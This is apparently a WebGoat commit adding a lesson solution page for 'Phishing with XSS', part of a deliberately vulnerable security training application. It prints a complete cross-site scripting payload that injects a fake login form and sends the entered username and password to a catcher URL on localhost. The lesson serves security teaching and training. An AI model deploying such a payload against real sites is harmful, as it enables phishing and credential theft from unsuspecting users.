* Hints added

* Solutions added
* Bugfixes
* Introduction added (including how to start with webgoat and useful tools)
* New lesson: Password strength
* New lessons: Multi Level Login
* Not yet working new lesson: Session fixation (inital release)

git-svn-id: http://webgoat.googlecode.com/svn/trunk/webgoat@301 4033779f-a91e-0410-96ef-6bf7bf53c507

main/project/WebContent/lesson_solutions/Phishing.html

@@ -0,0 +1,67 @@
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution Lab Block Stored XSS</title>
+<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> Phishing with XSS</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+It is always a good practice to validate all input on the 
+server side. XSS can occur when unvalidated user input is used 
+in an HTTP response. With the help of XSS you can do a Phishing 
+Attack and add content to a page which looks official. It is very 
+hard for a victim to determinate that the content is malicious.
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+The user should be able to add a form asking for username 
+and password. On submit the input should be sent to 
+http://localhost/WebGoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName
+</p>
+
+<b>Solution:</b><br/>
+With XSS it is possible to add further elements to an exsisting Page.
+This solution consists of two parts you have to combine:
+<ul>
+<li>A form the victim has to fill in</li>
+<li>A script which reads the form and sends the gathered information to the attacker</li>
+</ul>
+A Form whith username and password could look like this:<br/>
+<p>
+&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3
+&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot;
+name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot;
+name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;
+<br/><br/>Search for this term and you will see that a form is added to the page.
+</p>
+Now you need a script:
+<p>
+&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
+User Name = &quot; + document.forms[0].user.value + &quot;Password = &quot; +  document.forms[0].pass.value); 
+XSSImage=new Image; XSSImage.src=&quot;http://localhost/WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+
+document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}
+&lt;/script&gt;
+</p>
+<p>
+This script will read the input from the form and send it to the catcher of WebGoat.<br/><br/>
+The last step is to put things together. Add a Button to the form which
+calls the script. You can reach this wicht the onclick="myFunction" handler.
+<p>
+The final String looks like this:<br/>
+&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen.
+User Name = &quot; + document.forms[0].user.value + &quot;Password = &quot; +  document.forms[0].pass.value); 
+XSSImage=new Image; XSSImage.src=&quot;http://localhost/WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+
+document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}
+&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3
+&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; 
+name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; 
+name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; 
+value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;
+</p>
+Search for this String and you will see a form asking for your username and password.
+Fill in these fields and click on the Login Button.
+</body>
+</html>
+